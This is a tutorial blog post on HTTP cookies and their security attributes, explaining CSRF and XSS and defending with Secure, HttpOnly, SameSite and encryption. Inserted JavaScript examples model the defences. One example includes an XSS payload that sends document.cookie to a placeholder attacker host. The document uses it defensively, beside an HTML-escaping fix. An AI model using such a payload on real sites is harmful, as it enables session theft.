Cookies

6 min read · Nov 4, 2020

The Delicious Guards

What if you found out that there were hundreds of cookies hidden somewhere in your house?

Breaking out your inner child, you’d likely rush off to find them.

Unfortunately, these hidden cookies are not ones that you can see, or even eat. They are computer cookies, and they affect your online identity.

Cookies were first baked in 1994 by Lou Montulli at Netscape, who borrowed the name and the idea from the “magic cookie”, an older computing term for a small packet of data that one program hands out and later receives back unchanged.

What is a cookie?

A cookie is a small piece of named data that a website asks the browser to store on the user’s machine.

Cookies are plain text; they contain no executable code, and the browser never runs them.

A web page or server instructs the browser to store this information, and the browser then sends it back with subsequent requests to that site according to the cookie’s scope and attributes. Each cookie holds a very small amount of data: about 4KB including the name and value, and browsers reject anything larger.

Who creates cookies?

While it is possible to create cookies in the browser with document.cookie, most of the time it is the backend’s responsibility to set cookies in the response before sending it to the client, because cookies are what the server uses to recognise an authenticated user. By backend here we mean that cookies can be created by:

  • the actual application’s code on the backend
  • a webserver responding to requests (Nginx, Apache)

To do so, the backend adds a Set-Cookie header to the response whose value is a name=value pair, optionally followed by attributes such as Expires, Path, Secure or HttpOnly. On the next request the browser sends the pair back in a Cookie header; the attributes stay in the browser.

An Analog to Cookies

You can imagine cookies as an employee ID card. When you join a company, you receive a card carrying an ID. Every time you wish to enter the building, the card has to be presented at the security gate. And when you leave the company for good, the card is revoked and the ID no longer identifies you.

Cookies Different Flavours

Types of Cookies (Session Cookie vs Persistent Cookie)

First of all, decide how long your cookies should stay fresh.

The more sensitive the data, the sooner it should expire.

If a cookie carries neither an Expires date nor a Max-Age, it is a session cookie: the browser keeps it only for the current browsing session and discards it when the browser is closed (browsers that restore tabs on restart may keep session cookies alive longer than users expect, so do not rely on this for sensitive data). If the cookie does carry an expiry, it is a persistent cookie: the browser writes it to disk and removes it once the specified time is reached. When both Max-Age and Expires are present, Max-Age wins.
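To make the two preceding sections concrete (the Set-Cookie string the backend builds, the Cookie header the browser sends back, and the session-versus-persistent distinction), here is an added example in Node.js. It is not code from the original post; the helper names and the 4096-byte budget check are this example’s own constructions.

```javascript
// Added example (not from the original post): building a Set-Cookie header
// the way a backend would, and parsing the Cookie header the browser sends back.
// Names such as serializeSetCookie/parseCookieHeader are this example's own.

// Build one Set-Cookie header value from a name, a value and optional attributes.
function serializeSetCookie(name, value, attrs = {}) {
  // Cookie names are HTTP tokens: no separators, whitespace or control chars.
  if (!/^[\w!#$%&'*+.^`|~-]+$/.test(name)) throw new Error('invalid cookie name');
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (attrs.maxAge !== undefined) parts.push(`Max-Age=${Math.floor(attrs.maxAge)}`);
  if (attrs.expires) parts.push(`Expires=${attrs.expires.toUTCString()}`);
  if (attrs.domain) parts.push(`Domain=${attrs.domain}`);
  parts.push(`Path=${attrs.path || '/'}`);
  if (attrs.secure) parts.push('Secure');
  if (attrs.httpOnly) parts.push('HttpOnly');
  if (attrs.sameSite) parts.push(`SameSite=${attrs.sameSite}`);
  return parts.join('; ');
}

// Parse the Cookie request header ("a=1; b=2") into a plain object.
// Only name=value pairs come back from the browser; attributes never do.
function parseCookieHeader(header) {
  const out = {};
  for (const pair of (header || '').split(';')) {
    const idx = pair.indexOf('=');
    if (idx < 0) continue;
    const k = pair.slice(0, idx).trim();
    const v = pair.slice(idx + 1).trim();
    if (!k) continue;
    try { out[k] = decodeURIComponent(v); } catch { out[k] = v; }
  }
  return out;
}

// Classify a cookie by lifetime: no Expires/Max-Age means session cookie;
// Max-Age takes precedence over Expires when both are present (RFC 6265).
function cookieLifetime(attrs, now = new Date()) {
  if (attrs.maxAge !== undefined) {
    return { kind: 'persistent', expiresAt: new Date(now.getTime() + attrs.maxAge * 1000) };
  }
  if (attrs.expires) return { kind: 'persistent', expiresAt: attrs.expires };
  return { kind: 'session', expiresAt: null };
}

// Enforce the 4KB budget the post mentions: browsers drop oversized cookies.
function fitsCookieLimit(name, value) {
  return Buffer.byteLength(`${name}=${value}`) <= 4096;
}
```

A backend would call serializeSetCookie once per cookie and emit each result as its own Set-Cookie header; on the way back, parseCookieHeader turns the single Cookie header into a lookup table.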

Websites use HTTP cookies to streamline users’ web experiences. Cookies are intended to be used for the following purposes:

  1. Session management: for example, cookies let websites recognise a returning user and keep them logged in across requests.
  2. Personalisation: remembering user preferences such as language or theme; customised advertising is the most visible way cookies are used to personalise sessions.
  3. Tracking: shopping sites use cookies to track items users previously viewed, allowing the sites to suggest other goods they might like and to keep items in shopping carts while they continue shopping.

Cookies can be inspected in the following ways.

  • Using JavaScript (shows only cookies without the HttpOnly flag)
Right Click > Inspect Element > Console > document.cookie
  • Using the browser’s developer tools (shows every cookie, flags included)
Right Click > Inspect Element > Storage (Application in Chrome) > Cookies

Bittersweet Cookies

Cookies turn bitter because their contents are very interesting to attackers, who have ways either to read them or to abuse them without ever seeing them. The following are the two classic attacks involving cookies.

Cross-Site Request Forgery (CSRF, also written XSRF)

The browser attaches a site’s cookies to every request it sends to that site, regardless of which page caused the request. This is where the actual problem with cookies comes in. When the site receives the request, it cannot distinguish whether the action was initiated by the user or by a page on some other site: it looks for the cookie and, if the cookie is present, performs the action as if the user had initiated it. The textbook example is a page on an attacker’s site containing a hidden form that auto-submits a POST to a bank’s transfer endpoint; the victim’s browser, still logged in to the bank, sends the session cookie along and the bank carries out the transfer.

Cross-Site Scripting (XSS)

In cross-site scripting, an attacker gets their own script to run inside a page of the target site, usually by injecting it through input that the site echoes back into its HTML without escaping. Once it runs, that script can read document.cookie and send the user’s session cookie to a server the attacker controls, hijacking the session. A variant is cookie-based XSS, where the payload is placed in a cookie and later reflected into the page; that variant becomes harder if a cookie of that name has already been set, because the attacker then has to get their own value in front of the existing one in the cookie string before the payload is used.
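The following is an added example, not code from the original post, modelling the XSS scenario just described together with the HttpOnly ingredient discussed later: a page that reflects a query parameter into HTML, the payload an attacker would inject to exfiltrate document.cookie, the escaping fix, and a small model of what document.cookie exposes when a cookie carries HttpOnly. The cookie jar contents, the attacker hostname and the helper names are constructed for this example.

```javascript
// Added example (not from the original post). Models both halves of the XSS
// story: a page that reflects untrusted input into HTML, and what an injected
// script can see in document.cookie when HttpOnly is or is not set.
// The cookie jar and helper names below are this example's own constructions.

// Constructed cookie jar: what the browser holds for the site.
const JAR = [
  { name: 'session', value: 's3cr3t-session-id', httpOnly: true },
  { name: 'theme',   value: 'dark',              httpOnly: false },
];

// What document.cookie returns: every cookie for the site except HttpOnly ones.
function documentCookie(jar) {
  return jar.filter(c => !c.httpOnly).map(c => `${c.name}=${c.value}`).join('; ');
}

// A typical exfiltration payload an attacker injects via XSS (attacker.example
// is a placeholder host). It ships document.cookie to the attacker as a URL.
const PAYLOAD = '<script>new Image().src="https://attacker.example/c?"' +
                '+encodeURIComponent(document.cookie)</script>';

// Vulnerable: reflects the query parameter straight into HTML.
function renderVulnerable(search) {
  return `<p>You searched for: ${search}</p>`;
}

// Fixed: escape the five HTML-significant characters before interpolating,
// so the payload is displayed as text instead of parsed as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}
function renderSafe(search) {
  return `<p>You searched for: ${escapeHtml(search)}</p>`;
}

// Does the rendered HTML contain a live <script> element the browser would run?
function containsScript(html) {
  return /<script\b/i.test(html);
}
```

Two defences layer here: escaping stops the script from running at all, and HttpOnly means that even if some other injection succeeds, documentCookie never hands the session cookie to the payload.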

Making Cookies Delicious Again

Adding Security Ingredients to Cookies

To make sure cookies do not turn bitter, some security ingredients are added when creating a cookie.

Ingredient 1: Secure

Adding this attribute makes sure the cookie is only transmitted over HTTPS; the browser will not send it over unencrypted HTTP connections, where anyone on the network path could read it off the wire.

Ingredient 2: HttpOnly

This attribute makes the cookie inaccessible to the document.cookie API, so scripts running in the page (including an injected XSS payload) can neither read nor change it. The browser still sends it with every request, so only the server can see and rewrite it.

Ingredient 3: SameSite

This attribute lets the server require that a cookie is not sent on cross-site requests, only on requests initiated from the same site as the cookie (site meaning the registrable domain, such as example.com, not the full origin), which is a great help towards reducing the risk of CSRF attacks. SameSite can take the following values:

  • ‘Strict’: the cookie is never sent on a cross-site request, not even when the user follows a link from another site to yours; that first request arrives without the cookie, so the user may appear logged out until they navigate again.
  • ‘Lax’: the cookie is withheld from cross-site subresource requests and cross-site POSTs (the CSRF case), but is sent on top-level navigations that use a safe method such as GET, so links from other sites still work. Chrome and browsers built on it treat cookies with no SameSite attribute as Lax.
  • ‘None’: the cookie is sent on all cross-site requests, which is what third-party embeds need; browsers accept this value only together with the Secure attribute.
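As an added example (not code from the original post), here is a small model of the browser’s decision whether to attach a cookie to a request, run against the CSRF scenario described above for each SameSite value, and including the Secure rule. The site comparison is deliberately simplified to the last two host labels (real browsers consult the Public Suffix List), and the hostnames, cookie and request objects are constructed for the example.

```javascript
// Added example (not from the original post): a model of when a browser attaches
// a cookie to a request, exercised with the CSRF case the post describes.
// Site comparison is simplified to the host's last two labels; real browsers
// use the Public Suffix List. Function and host names are this example's own.

function siteOf(host) {
  return host.split('.').slice(-2).join('.');   // assumption: no public-suffix handling
}

// cookie: { name, value, secure, sameSite }   sameSite is 'Strict' | 'Lax' | 'None' | undefined
// req:    { url, method, initiator, topLevel } initiator = host of the page that caused the
//                                              request; topLevel = true for navigations
//                                              (link click, form submit), false for subresources
function shouldAttachCookie(cookie, req) {
  const target = new URL(req.url);
  if (cookie.secure && target.protocol !== 'https:') return false;      // Secure attribute
  if (siteOf(req.initiator) === siteOf(target.hostname)) return true;   // same-site: always
  const mode = cookie.sameSite || 'Lax';   // modern browsers default to Lax
  switch (mode) {
    case 'Strict': return false;
    case 'Lax':    return req.topLevel && ['GET', 'HEAD'].includes(req.method);
    case 'None':   return cookie.secure;   // None is only honoured together with Secure
    default:       return false;
  }
}

// Constructed CSRF scenario: attacker.example hosts an auto-submitting form that
// POSTs to bank.example/transfer while the victim is logged in to bank.example.
const SESSION   = { name: 'sid', value: 'abc', secure: true };
const CSRF_POST = { url: 'https://bank.example/transfer', method: 'POST',
                    initiator: 'attacker.example', topLevel: true };
const LEGIT_POST = { ...CSRF_POST, initiator: 'bank.example' };
const LINK_GET   = { ...CSRF_POST, method: 'GET', url: 'https://bank.example/account' };

// Run the scenario under each SameSite setting and report which requests carry the cookie.
function csrfReport() {
  const report = {};
  for (const mode of ['None', 'Lax', 'Strict']) {
    const cookie = { ...SESSION, sameSite: mode };
    report[mode] = {
      crossSitePost: shouldAttachCookie(cookie, CSRF_POST),   // the forged transfer
      sameSitePost:  shouldAttachCookie(cookie, LEGIT_POST),  // the user's own transfer
      externalLink:  shouldAttachCookie(cookie, LINK_GET),    // link from another site
    };
  }
  return report;
}
```

Reading the report: with None the forged POST carries the session cookie and the CSRF succeeds; Lax blocks the forged POST while still letting an external link land the user logged in; Strict blocks both, which is safest for a session cookie but means a link from elsewhere arrives anonymous.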

Ingredient 4: Encryption

Encryption is the strongest ingredient of all, provided it is done right. The encryption key is stored only on the server, so only the server can decrypt the cookie and make meaningful changes to it. An attacker can still change bits of the ciphertext, and with unauthenticated modes such as plain CBC or CTR those bit flips produce predictable changes in the decrypted plaintext, so encryption alone is not enough. Pair it with an anti-tampering measure, either an HMAC over the ciphertext or an authenticated mode such as AES-GCM; then any modification invalidates the cookie and the server simply rejects it. If the contents are not secret and you only need to stop tampering, a signature alone is sufficient.

To add the cherry on top, clear the cookie when the user logs out (send a Set-Cookie for the same name with Max-Age=0) and invalidate the session on the server as well, since the browser’s expiry is only honoured by the browser. Use session cookies if possible; otherwise set a strict expiration. The browser never sends the Expires attribute back, so if the server needs to know what it can still digest and what it cannot, put an issued-at timestamp inside the protected cookie value or track expiry server-side.

Let’s Bake

Using Node.js we can add these protections when the cookie is created.

Encrypting the data inside the cookie means that only the dedicated server can digest it. Sending that encrypted cookie with HttpOnly, Secure and SameSite enabled means it is not meant to be eaten by anyone else: in the browser console, document.cookie returns an empty string because HttpOnly hides the cookie from scripts.

You can find the source code in the GitHub link below.

Now with every request, the user becomes invisible

When you build in silence, they don’t know what to attack
